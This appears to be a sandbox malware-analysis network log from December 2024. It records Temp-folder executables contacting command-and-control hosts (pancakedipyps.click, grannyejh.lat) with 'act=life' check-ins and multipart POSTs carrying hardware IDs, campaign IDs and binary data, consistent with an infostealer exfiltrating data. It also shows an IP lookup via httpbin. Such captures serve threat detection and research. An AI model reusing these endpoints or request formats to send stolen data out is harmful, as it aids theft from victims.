2024-12-18 12:38:38 UTC	1369	IN	Data Raw: 62 65 73 48 57 6e 35 64 32 48 72 7a 6e 69 59 67 79 65 36 78 75 43 66 6b 56 68 6e 30 30 51 4d 30 56 6b 51 5a 56 43 56 63 2f 69 59 71 2b 5a 41 4c 64 42 71 59 76 37 61 63 39 36 62 5a 61 75 44 36 4a 58 55 44 53 44 59 53 52 4c 49 58 52 39 67 57 4e 45 39 74 5a 53 39 71 42 46 68 2f 58 46 6d 2f 4e 46 31 6c 6f 34 69 74 38 2f 69 6d 6f 5a 57 59 5a 67 4a 58 73 52 43 56 44 4d 63 38 67 36 50 76 50 4f 35 56 6e 53 31 65 6d 32 75 68 44 43 66 6a 43 79 38 78 2f 32 58 68 6c 74 6e 32 45 45 57 79 31 30 59 5a 56 4c 48 4e 62 6d 66 76 61 6b 51 5a 50 46 38 5a 65 72 51 64 39 37 4b 61 37 58 62 72 38 48 55 66 57 50 43 58 56 7a 74 55 52 52 73 54 4d 4d 6d 2b 49 44 39 76 31 68 71 2b 54 30 35 72 74 68 37 6c 49 30 6f 75 38 66 69 6d 5a 31 61 61 64 42 4b 46 74 46 62 48 6e 6c 59 30 44 79 33 Data Ascii: besHWn5d2HrzniYgye6xuCfkVhn00QM0VkQZVCVc/iYq+ZALdBqYv7ac96bZauD6JXUDSDYSRLIXR9gWNE9tZS9qBFh/XFm/NF1lo4it8/imoZWYZgJXsRCVDMc8g6PvPO5VnS1em2uhDCfjCy8x/2Xhltn2EEWy10YZVLHNbmfvakQZPF8ZerQd97Ka7Xbr8HUfWPCXVztURRsTMMm+ID9v1hq+T05rth7lI0ou8fimZ1aadBKFtFbHnlY0Dy3
2024-12-18 12:38:38 UTC	1369	IN	Data Raw: 42 67 39 6e 56 7a 37 74 46 77 6a 4a 59 74 75 63 32 76 31 39 52 53 65 4a 67 66 58 76 4a 4e 48 79 74 44 6d 79 54 34 6d 4c 2f 6d 51 43 33 32 64 32 7a 67 7a 6e 53 59 6a 79 69 38 79 2b 71 52 6b 46 39 74 31 30 77 55 79 6c 49 55 5a 46 6e 64 4e 72 36 52 73 71 41 55 59 4c 55 7a 49 65 6e 45 4d 4d 62 45 44 4b 6a 4f 36 59 36 46 59 47 66 59 46 6c 37 63 46 41 30 72 57 39 6c 39 34 4e 2b 2b 71 68 4a 67 38 48 6c 70 36 64 39 78 6b 6f 41 6d 76 38 66 6d 6e 5a 46 48 63 74 35 4a 48 73 78 55 47 32 64 4f 32 7a 69 34 6b 2f 50 6f 57 47 72 74 50 54 6d 75 37 57 65 65 78 44 54 38 32 71 2b 65 6d 42 55 34 6d 45 67 54 30 56 59 62 61 31 33 57 4f 62 4f 59 74 61 41 5a 62 76 42 2b 5a 4f 6a 64 63 4a 4b 4f 4c 4c 72 4a 34 5a 53 53 55 57 62 65 42 31 43 44 58 51 77 72 42 4a 55 50 74 5a 47 36 70 Data Ascii: Bg9nVz7tFwjJYtuc2v19RSeJgfXvJNHytDmyT4mL/mQC32d2zgznSYjyi8y+qRkF9t10wUylIUZFndNr6RsqAUYLUzIenEMMbEDKjO6Y6FYGfYFl7cFA0rW9l94N++qhJg8Hlp6d9xkoAmv8fmnZFHct5JHsxUG2dO2zi4k/PoWGrtPTmu7WeexDT82q+emBU4mEgT0VYba13WObOYtaAZbvB+ZOjdcJKOLLrJ4ZSSUWbeB1CDXQwrBJUPtZG6p
2024-12-18 12:38:38 UTC	1369	IN	Data Raw: 36 61 65 48 59 63 4a 48 45 5a 66 4c 45 39 39 6e 4d 46 55 44 54 55 54 2f 4e 55 51 59 72 51 35 73 6b 2b 4a 69 2f 35 6b 41 74 2b 33 52 67 35 74 4a 38 6c 6f 41 35 73 73 6a 6d 6c 70 56 61 59 4e 74 47 46 4d 74 49 45 6d 74 58 33 54 71 77 6d 37 32 30 47 57 4b 31 4d 79 48 70 78 44 44 47 78 42 71 6b 78 4f 69 57 31 6e 78 6e 77 30 59 55 77 46 45 59 4b 30 4f 62 4a 50 69 59 76 2b 5a 41 4c 66 68 78 62 4f 72 4f 66 4a 36 45 49 72 58 4a 2f 5a 61 62 57 47 50 59 51 67 7a 43 53 42 74 67 57 64 59 35 74 35 43 2f 72 68 49 74 75 7a 31 6d 39 70 77 6f 33 71 67 6f 6f 38 6d 74 76 6f 35 44 5a 39 52 57 46 63 35 57 56 48 51 53 7a 48 32 2f 6b 2f 50 2b 57 47 33 30 63 48 50 72 33 58 71 55 69 53 4f 39 78 75 71 57 6b 46 46 72 31 6c 55 51 7a 46 6f 53 59 46 33 51 50 72 4f 56 76 61 38 4b 4c 62 Data Ascii: 6aeHYcJHEZfLE99nMFUDTUT/NUQYrQ5sk+Ji/5kAt+3Rg5tJ8loA5ssjmlpVaYNtGFMtIEmtX3Tqwm720GWK1MyHpxDDGxBqkxOiW1nxnw0YUwFEYK0ObJPiYv+ZALfhxbOrOfJ6EIrXJ/ZabWGPYQgzCSBtgWdY5t5C/rhItuz1m9pwo3qgoo8mtvo5DZ9RWFc5WVHQSzH2/k/P+WG30cHPr3XqUiSO9xuqWkFFr1lUQzFoSYF3QPrOVva8KLb
2024-12-18 12:38:38 UTC	1369	IN	Data Raw: 33 33 57 62 6a 69 65 2b 77 75 65 51 6e 6c 42 6c 33 6b 30 64 7a 56 55 56 5a 31 6a 63 4d 37 48 66 2f 65 59 66 64 62 55 6c 49 64 6a 4d 64 34 61 4a 4f 2f 44 78 37 49 69 46 51 47 33 49 51 56 7a 73 57 52 68 6f 57 64 49 74 2b 49 44 39 76 31 68 71 2b 54 30 35 72 74 78 30 6b 6f 63 73 76 4d 7a 69 6c 70 4e 65 62 39 4a 4a 44 4d 78 66 48 47 64 55 32 43 2b 79 6c 61 47 76 45 57 44 37 64 58 50 74 6e 44 37 65 67 7a 50 79 6d 36 2b 72 6e 6c 5a 73 7a 6b 6f 52 67 30 56 61 63 68 7a 53 4d 66 6a 48 38 37 51 4b 62 66 35 39 5a 75 44 4f 63 5a 61 4c 49 62 4c 46 35 4a 4f 58 58 47 54 57 54 68 6a 43 56 78 56 71 58 4e 41 39 73 59 32 2b 35 6c 59 74 38 6d 55 68 74 70 78 48 6b 6f 38 61 73 64 57 76 68 74 70 4d 49 4e 39 4c 58 70 73 61 46 58 6c 52 33 54 6d 34 6b 72 57 74 47 57 7a 32 66 57 48 Data Ascii: 33Wbjie+wueQnlBl3k0dzVUVZ1jcM7Hf/eYfdbUlIdjMd4aJO/Dx7IiFQG3IQVzsWRhoWdIt+ID9v1hq+T05rtx0kocsvMzilpNeb9JJDMxfHGdU2C+ylaGvEWD7dXPtnD7egzPym6+rnlZszkoRg0VachzSMfjH87QKbf59ZuDOcZaLIbLF5JOXXGTWThjCVxVqXNA9sY2+5lYt8mUhtpxHko8asdWvhtpMIN9LXpsaFXlR3Tm4krWtGWz2fWH
2024-12-18 12:38:38 UTC	1369	IN	Data Raw: 73 52 73 73 64 48 39 6e 35 64 44 59 35 39 35 49 4f 4e 52 41 6d 70 52 33 6a 47 47 6f 61 61 6c 46 6d 50 79 61 33 43 75 6b 6a 43 52 78 48 4f 4c 67 36 66 5a 71 78 73 67 77 41 64 47 67 32 38 58 5a 56 4c 53 4b 36 6e 53 6b 36 30 4f 62 50 68 32 62 61 7a 64 66 59 36 44 61 2f 79 44 36 64 6e 4d 42 53 36 59 51 77 2b 44 41 6b 51 35 42 34 42 75 37 38 2f 68 75 56 5a 30 74 57 73 68 74 6f 34 2b 33 70 5a 72 36 6f 4f 6f 6d 6f 5a 48 5a 74 74 52 48 59 52 6b 4b 6b 74 58 32 54 36 30 6e 72 54 6d 56 69 33 36 50 54 6e 58 6e 48 4f 4d 6c 6d 53 6a 31 65 4b 4a 6b 78 6c 6f 79 55 6f 53 67 78 52 55 4a 31 6a 65 4d 62 32 59 6f 2b 6b 4b 66 66 35 78 64 36 4c 59 59 74 37 4b 61 36 50 49 34 49 75 61 55 69 2f 4a 55 52 50 54 57 52 46 73 45 4e 30 73 74 5a 50 7a 36 46 68 34 2f 6e 46 6e 34 38 6b 2f Data Ascii: sRssdH9n5dDY595IONRAmpR3jGGoaalFmPya3CukjCRxHOLg6fZqxsgwAdGg28XZVLSK6nSk60ObPh2bazdfY6Da/yD6dnMBS6YQw+DAkQ5B4Bu78/huVZ0tWshto4+3pZr6oOomoZHZttRHYRkKktX2T60nrTmVi36PTnXnHOMlmSj1eKJkxloyUoSgxRUJ1jeMb2Yo+kKff5xd6LYYt7Ka6PI4IuaUi/JURPTWRFsEN0stZPz6Fh4/nFn48k/
2024-12-18 12:38:38 UTC	1369	IN	Data Raw: 37 53 2f 4a 65 66 51 32 65 59 65 46 43 44 51 6c 51 7a 48 4f 41 2b 74 70 47 30 73 41 6b 67 30 33 35 6d 36 4e 39 2b 69 5a 56 72 2f 49 50 70 32 63 77 48 4c 70 68 44 44 34 4d 43 52 44 6b 48 67 47 37 76 7a 2b 47 35 56 6e 53 31 61 79 47 32 6a 7a 37 65 6c 6d 76 71 67 36 69 58 6d 56 52 6a 31 6b 51 4d 30 56 77 58 66 56 2b 53 41 34 61 36 76 71 73 64 59 2f 4a 44 58 38 2f 57 59 4a 4f 4c 4c 49 7a 39 32 49 69 54 52 53 4c 2b 52 41 6a 41 47 6c 6f 72 52 4a 56 6c 2b 4c 36 35 74 68 56 69 38 6a 30 76 72 74 67 77 78 73 51 4f 76 38 37 71 6c 35 4d 58 51 64 4a 58 45 38 78 64 56 43 55 63 32 58 33 67 33 37 4b 73 43 47 44 36 65 69 33 70 78 6e 66 65 79 6d 75 38 67 37 66 5a 6c 56 39 77 31 55 67 5a 6a 31 77 61 5a 52 7a 4b 63 36 48 66 70 65 5a 41 50 72 73 39 63 36 36 45 4d 4e 6d 4b 4a Data Ascii: 7S/JefQ2eYeFCDQlQzHOA+tpG0sAkg035m6N9+iZVr/IPp2cwHLphDD4MCRDkHgG7vz+G5VnS1ayG2jz7elmvqg6iXmVRj1kQM0VwXfV+SA4a6vqsdY/JDX8/WYJOLLIz92IiTRSL+RAjAGlorRJVl+L65thVi8j0vrtgwxsQOv87ql5MXQdJXE8xdVCUc2X3g37KsCGD6ei3pxnfeymu8g7fZlV9w1UgZj1waZRzKc6HfpeZAPrs9c66EMNmKJ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49717	104.21.23.76	443	3640	C:\Users\user\AppData\Local\Temp\1016896001\44cc35716d.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 12:38:33 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: pancakedipyps.click
2024-12-18 12:38:33 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-18 12:38:39 UTC	1037	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 12:38:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=eeq3fdf87k3kgnbm9qnusvde1g; expires=Sun, 13-Apr-2025 06:25:14 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UaS9fhtivOxcgkKnM53YW%2FzGUMX8WJSJAluE5rTs%2FN%2Bd932VxBvpqDGDi4JwTRQnIL6riPLVByIlHF33RdMYDtN4ZNNUxqWP8IJfWQ6pZSnQ1qpMdY3IPywUiZG47CpXHp7Rsmkq"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3f35ebac8842b5-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1931&min_rtt=1672&rtt_var=812&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=910&delivery_rate=1746411&cwnd=214&unsent_bytes=0&cid=67a870f2ea5f1ee0&ts=5971&x=0"
2024-12-18 12:38:39 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-18 12:38:39 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49718	104.21.64.80	443	6704	C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 12:38:39 UTC	269	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=6C1M3S15 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12791 Host: grannyejh.lat
2024-12-18 12:38:39 UTC	12791	OUT	Data Raw: 2d 2d 36 43 31 4d 33 53 31 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 39 44 41 37 34 35 33 36 42 37 33 32 43 43 42 30 30 44 35 37 46 39 44 44 44 33 37 42 45 30 43 0d 0a 2d 2d 36 43 31 4d 33 53 31 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 36 43 31 4d 33 53 31 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 39 38 39 37 38 33 33 37 30 0d 0a 2d 2d 36 43 31 4d 33 53 31 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 Data Ascii: --6C1M3S15Content-Disposition: form-data; name="hwid"59DA74536B732CCB00D57F9DDD37BE0C--6C1M3S15Content-Disposition: form-data; name="pid"2--6C1M3S15Content-Disposition: form-data; name="lid"yau6Na--6989783370--6C1M3S15Content-Dis
2024-12-18 12:38:42 UTC	1032	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 12:38:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=1ksd2f8utdjklbjhn5avef4ill; expires=Sun, 13-Apr-2025 06:25:19 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U%2B1agAshwgMKFEqxPaBuLfscd7lv53yURd5iBsVx0rcZwDVlH0MV6yji%2F%2BqtJ6CB6o0BCVmFIOvD0fKD9CT4ngzzyiZsxB1XIugMpeElBuQDsY5rqsIx1FWIKqNVHNm3"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3f3614dd9dc40e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1677&min_rtt=1658&rtt_var=659&sent=9&recv=17&lost=0&retrans=0&sent_bytes=2829&recv_bytes=13718&delivery_rate=1613259&cwnd=184&unsent_bytes=0&cid=3d27c1ccfc27b2fb&ts=2591&x=0"
2024-12-18 12:38:42 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-18 12:38:42 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49722	104.21.64.80	443	6704	C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 12:38:44 UTC	273	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=JI21C74WTVL0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15044 Host: grannyejh.lat
2024-12-18 12:38:44 UTC	15044	OUT	Data Raw: 2d 2d 4a 49 32 31 43 37 34 57 54 56 4c 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 39 44 41 37 34 35 33 36 42 37 33 32 43 43 42 30 30 44 35 37 46 39 44 44 44 33 37 42 45 30 43 0d 0a 2d 2d 4a 49 32 31 43 37 34 57 54 56 4c 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4a 49 32 31 43 37 34 57 54 56 4c 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 39 38 39 37 38 33 33 37 30 0d 0a 2d 2d 4a 49 32 31 43 37 34 57 54 Data Ascii: --JI21C74WTVL0Content-Disposition: form-data; name="hwid"59DA74536B732CCB00D57F9DDD37BE0C--JI21C74WTVL0Content-Disposition: form-data; name="pid"2--JI21C74WTVL0Content-Disposition: form-data; name="lid"yau6Na--6989783370--JI21C74WT
2024-12-18 12:38:47 UTC	1032	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 12:38:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=jj40hshmmb1nou3do96d47eplq; expires=Sun, 13-Apr-2025 06:25:24 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J4apNRPg3IIHBCnDY38pnUGbcklsmvLBsRmubvsM5uQ5grvV2A%2BaJcYM7FiSHhfPXuBqyqxudB%2BwZ4rpbFgnKkEm%2FKRdgotXyJdDc4Mpvy2MKnPriVAhZSxkkHR24mzB"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3f3631afd7729b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1842&min_rtt=1836&rtt_var=701&sent=9&recv=19&lost=0&retrans=0&sent_bytes=2830&recv_bytes=15975&delivery_rate=1545791&cwnd=249&unsent_bytes=0&cid=0db78d63617a9524&ts=3282&x=0"
2024-12-18 12:38:47 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-18 12:38:47 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49721	98.85.100.80	443	4412	C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 12:38:44 UTC	52	OUT	GET /ip HTTP/1.1 Host: httpbin.org Accept: /
2024-12-18 12:38:44 UTC	224	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 12:38:44 GMT Content-Type: application/json Content-Length: 31 Connection: close Server: gunicorn/19.9.0 Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: true
2024-12-18 12:38:44 UTC	31	IN	Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a Data Ascii: { "origin": "8.46.123.189"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.8	49726	104.21.64.80	443	6704	C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 12:38:49 UTC	270	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=PHG9U19OD User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20193 Host: grannyejh.lat
2024-12-18 12:38:49 UTC	15331	OUT	Data Raw: 2d 2d 50 48 47 39 55 31 39 4f 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 39 44 41 37 34 35 33 36 42 37 33 32 43 43 42 30 30 44 35 37 46 39 44 44 44 33 37 42 45 30 43 0d 0a 2d 2d 50 48 47 39 55 31 39 4f 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 50 48 47 39 55 31 39 4f 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 39 38 39 37 38 33 33 37 30 0d 0a 2d 2d 50 48 47 39 55 31 39 4f 44 0d 0a 43 6f 6e 74 65 6e 74 Data Ascii: --PHG9U19ODContent-Disposition: form-data; name="hwid"59DA74536B732CCB00D57F9DDD37BE0C--PHG9U19ODContent-Disposition: form-data; name="pid"3--PHG9U19ODContent-Disposition: form-data; name="lid"yau6Na--6989783370--PHG9U19ODContent
2024-12-18 12:38:49 UTC	4862	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 3e 37 1c 1d 96 fa 7e 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 73 c3 c1 e7 62 c9 e0 95 58 f0 4a f0 ab c1 ff 36 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc e4 dd 93 3c 16 af 54 8b b3 c5 72 6e a6 5a 98 2a 94 a7 ae e5 a6 2a 8d 72 3d 31 9a 3c bc 29 a5 d6 98 ff 70 58 68 ff bb af ff fe e4 44 a2 4b 2d b9 ca 4c ae 76 b9 91 af 16 6a c9 bb 46 a2 8c 4b 7d 38 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 61 38 3a 2c f5 fd 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 e7 86 a3 c3 52 df Data Ascii: >7~sbXJ6<TrnZ**r=1<)pXhDK-LvjFK}8a8:,0R
2024-12-18 12:38:50 UTC	1037	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 12:38:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=upuhlem61pje794fsu1bno54lk; expires=Sun, 13-Apr-2025 06:25:29 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BtuSlN1byYMuHFmti0o1RtwNdaKMS9vEmRFHqaRQargGvK1VasfVhKfa6Vjz6aghoczR54MTa%2BUoR%2BdyysxurY17SImELfZFuMcu79pyLv%2BJ%2FWHVVdc4mCLy7J69Qq8b"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3f36507d927d26-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1799&min_rtt=1796&rtt_var=680&sent=15&recv=24&lost=0&retrans=0&sent_bytes=2830&recv_bytes=21143&delivery_rate=1600877&cwnd=205&unsent_bytes=0&cid=cf46031a5bc17d7b&ts=1534&x=0"
2024-12-18 12:38:50 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-18 12:38:50 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.8	49728	104.21.64.80	443	6704	C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 12:38:52 UTC	269	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=A790N8SOW User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1195 Host: grannyejh.lat
2024-12-18 12:38:52 UTC	1195	OUT	Data Raw: 2d 2d 41 37 39 30 4e 38 53 4f 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 39 44 41 37 34 35 33 36 42 37 33 32 43 43 42 30 30 44 35 37 46 39 44 44 44 33 37 42 45 30 43 0d 0a 2d 2d 41 37 39 30 4e 38 53 4f 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 41 37 39 30 4e 38 53 4f 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 39 38 39 37 38 33 33 37 30 0d 0a 2d 2d 41 37 39 30 4e 38 53 4f 57 0d 0a 43 6f 6e 74 65 6e 74 Data Ascii: --A790N8SOWContent-Disposition: form-data; name="hwid"59DA74536B732CCB00D57F9DDD37BE0C--A790N8SOWContent-Disposition: form-data; name="pid"1--A790N8SOWContent-Disposition: form-data; name="lid"yau6Na--6989783370--A790N8SOWContent
2024-12-18 12:38:53 UTC	1030	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 12:38:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=tpsnr01dsr6l19uf3iue04v6dq; expires=Sun, 13-Apr-2025 06:25:32 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xs8qh6SGYpZkWXCVM6ptuVRjkWrgkmlDVDRBFQavEVuEf0J3Ec8Ey2%2F8p4gARxP%2FICiU2eiNZEBT5mFRGmJFr86P0GQIW%2FBxu14MfzieqKoL8iXGUNP851oMjWBky21J"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3f3664a9cd429e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2616&min_rtt=2037&rtt_var=1177&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=2100&delivery_rate=1433480&cwnd=208&unsent_bytes=0&cid=be43657e2ad33ad3&ts=849&x=0"
2024-12-18 12:38:53 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-18 12:38:53 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.8	49730	104.21.64.80	443	6704	C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe

Timestamp	Bytes transferred	Direction	Data
